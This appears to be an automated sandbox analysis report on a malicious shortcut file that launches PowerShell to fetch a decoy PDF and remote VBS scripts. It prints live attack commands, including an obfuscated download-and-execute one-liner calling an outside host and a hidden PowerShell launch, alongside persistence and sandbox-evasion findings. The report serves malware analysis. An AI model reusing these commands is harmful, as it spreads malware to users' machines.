      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior

      Boot Survival

      barindex
      Powershell creates an autostart link
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htctewww.astjlqntjlqrprisjlqs.com.pk/ms/List%20of%20rjlqquirjlqd%20itjlqms%20and%20sjlqrvicjlqs.pdf';getit -fz $flol -oulv 'http://www.blujlqmaxxlasjlqr.com/ms/ms.vbs';exit[Environment]::GetEnvironmentVariable('public') + '\\iys.vbs'@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recyclebin", "Get-Clipboard", "Set-Clipboard", "Get-ComputerInfo", "Get-TimeZone", "Set-TimeZone")CompatiblePSEditions = @('Desktop','Core')} if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView") { $myinv = $_.InvocationInfo if ($myinv -and $myinv.MyCommand)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5417Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4347Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3304Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 673Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7304Thread sleep time: -12912720851596678s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep count: 3304 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep count: 673 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 7132Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: svchost.exe, 0000000B.00000002.3460971612.000001EA0D454000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.3459077045.000001EA07E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_2744.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2744, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ${kilo4z} = $pshome;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'a' + ${kilo4z}[-66 +55];${o5d.} = $([type]${*opso25.});${*.f2iuzg.} = ${o5d.}::tostring(+79 -1 -5)+${o5d.}::tostring(+79 -1 -5 -4)+${o5d.}::tostring(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -usebasicparsing'))
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
